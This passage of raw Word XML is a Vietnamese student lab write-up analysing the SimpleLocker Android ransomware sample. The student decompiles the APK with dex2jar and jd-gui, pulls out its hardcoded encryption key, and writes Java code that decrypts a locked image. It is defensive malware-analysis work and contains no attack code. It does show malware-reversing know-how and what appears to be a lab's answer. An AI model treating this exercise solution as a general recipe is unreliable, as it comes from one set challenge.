      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc531729515"/>
      <w:bookmarkStart w:id="3" w:name="_Toc533387040"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D6A" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bài tập Ransome ware.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="24CE8C0D" w14:textId="584308DB" w:rsidR="00EE1D6A" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="00EE1D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Giải nén file “ch10.zip”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB78ED4" w14:textId="412F6C24" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="00EE1D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Phần mềm diệt virus phát hiện có mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E9F97" w14:textId="53548003" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="00EE1D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Phát hiện file chứa mã độc trong thư mục “Android-dump\app\org.simplelocker-1.apk”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAE671F" w14:textId="7200866C" w:rsidR="003D346E" w:rsidRPr="003D346E" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D346E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Phát hiện file bị mã hóa trong thư mục “Android-dump\media\Documents\Confidentiel.jpg.enc”</w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBFD23F" w14:textId="12D5A1AF" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D346E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Sử dụng tool “dex2jar” để chuyển file “org.simplelocker-1.apk” thành file “org.simplelocker-1.jar”</w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A872BE" w14:textId="63102795" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DCB7942" wp14:editId="01F7DC08">
            <wp:extent cx="5943600" cy="400050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="696" name="Picture 696" descr="https://lh3.googleusercontent.com/cfDGJbbsUw8TVFmFJ2vaomTHQ5VUCXUVeUebu3_2QpUcReQIn8XbmKX0zDI93_MH4dToroU3a-Xq2n4AQR1L7pfLjExjWFARhPlzHHkOYjnzj9mt2XF96kJjFvxhdpWUfO3jdVNsJzBZEdfb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fDGJbbsUw8TVFmFJ2vaomTHQ5VUCXUVeUebu3_2QpUcReQIn8XbmKX0zDI93_MH4dToroU3a-Xq2n4AQR1L7pfLjExjWFARhPlzHHkOYjnzj9mt2XF96kJjFvxhdpWUfO3jdVNsJzBZEdfbj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050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F66565" w14:textId="21D76E3F" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Sử dụng tool “jd-gui” để mở file “org.simplelocker-1.jar”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73332790" w14:textId="42B6823B" w:rsidR="003D346E" w:rsidRPr="003D346E" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D346E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">-Phát hiện key mã hóa và giải </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D346E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mã :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D346E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="003D346E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2900FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mcsTnTld1dDn”</w:t>
      </w:r>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2900FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AD2DB1" w14:textId="7AD5255B" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="270E59BE" wp14:editId="3199F83E">
            <wp:extent cx="5943600" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="697" name="Picture 697" descr="https://lh4.googleusercontent.com/LRftSvHVxRfIKBgrsJesozuK-ulCSyXq7SaVYuVK4hfSSOqZX1aYFFwyfY25Z_NmPEVMYGMNBE2bkdwBYJx2yb-I3yAToIJ479KHxRH-F_BJFW4_graZWZIm6K3MiUz89SxEl0TDdDsic3N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RftSvHVxRfIKBgrsJesozuK-ulCSyXq7SaVYuVK4hfSSOqZX1aYFFwyfY25Z_NmPEVMYGMNBE2bkdwBYJx2yb-I3yAToIJ479KHxRH-F_BJFW4_graZWZIm6K3MiUz89SxEl0TDdDsic3NAB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71D615DF" w14:textId="7E24566A" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="30" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tiến hành giải mã file “Confidentiel.jpg.enc”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53142445" w14:textId="529409E1" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Sử dụng IDE “Net Beans” để viết code giải mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144BD349" w14:textId="77777777" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="003D346E" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7641C3FA"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public static void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>String[] args) throws Exception{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408525E"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5E4CC66D"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set default cipher password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42651B1D"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String cipher_password = "mcsTnTld1dDn";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE075E"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69FD8733"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overwrite cipher password if set by first argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E389881"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roofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>args.length == 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F52B3"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44545B98"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cipher_password = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>args[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734AA364"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116B36FB"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5928F434"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create new SimplelockerAntidote object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D5180"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DecryptFileEnc sa = new DecryptFileEnc(cipher_password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9C5079"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23C81BE8"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get array of filenames to decrypt from current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE366FA"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roofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>String[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>] files = sa.getEncryptedFiles();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F25A8B"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6088322D"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iterate through files in the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9E494"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for (int i = 0; i &lt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>files.length</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C2E1C1"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435B5060"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set input and output filenames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127539C"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 and remove the .enc file extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF4E40"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String inputFilename = files[i];            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5229F17F"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String outputFilename = inputFilename.substring(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>0,inputFilename.length</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()-4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2285E8"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7D77D6EA"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System.out.println("Decrypting "+outputFilename);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797CD3B4"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44D2949B"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            // call decrypt on the current file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9BCDA8"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roofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sa.decrypt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(inputFilename,outputFilename);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D8D95"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179D6805"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0CAC47F5"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System.out.println("Decryption complete.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48514810"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71466148"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340EEE55"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 xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDA115D" w14:textId="77777777" w:rsidR="00861030" w:rsidRPr="00861030" w:rsidRDefault="00861030" w:rsidP="00861030">
      <w:pPr>
        <w:spacing w:after="30" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00861030">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA80EE" w14:textId="3BF933AB" w:rsidR="003D346E" w:rsidRPr="00447E87" w:rsidRDefault="00861030" w:rsidP="003D346E">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Kết quả nhận được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624003F5" w14:textId="29402122" w:rsidR="00861030" w:rsidRPr="00447E87" w:rsidRDefault="00861030" w:rsidP="00861030">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44EF3082" wp14:editId="2FD13BFA">
            <wp:extent cx="2895600" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="698" name="Picture 698" descr="https://lh5.googleusercontent.com/6YCBfcHXPuyDGDVADiIqZ6tOyFGdEWq124Z-JT9Jl0weRu9klDrQ82NtaZiFJcvD1nGJIQB94bpV69XnKQl_3H0wAVgtmyOeoNgrtca4RV7vTwY4x1HNqkRCCxNHb6dN0dH2I2IiGei3RlH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YCBfcHXPuyDGDVADiIqZ6tOyFGdEWq124Z-JT9Jl0weRu9klDrQ82NtaZiFJcvD1nGJIQB94bpV69XnKQl_3H0wAVgtmyOeoNgrtca4RV7vTwY4x1HNqkRCCxNHb6dN0dH2I2IiGei3RlHA5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742950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43D99D" w14:textId="77777777" w:rsidR="00861030" w:rsidRPr="00447E87" w:rsidRDefault="00861030" w:rsidP="00861030">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9F5813" w14:textId="2AB7E24E" w:rsidR="00861030" w:rsidRPr="00447E87" w:rsidRDefault="00861030" w:rsidP="00861030">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tiến hành mở file “Confidentiel.jpg”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B718634" w14:textId="4DAE7453" w:rsidR="00861030" w:rsidRPr="00447E87" w:rsidRDefault="00861030" w:rsidP="00861030">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DAF5138" wp14:editId="21D39957">
            <wp:extent cx="3810000" cy="3829050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
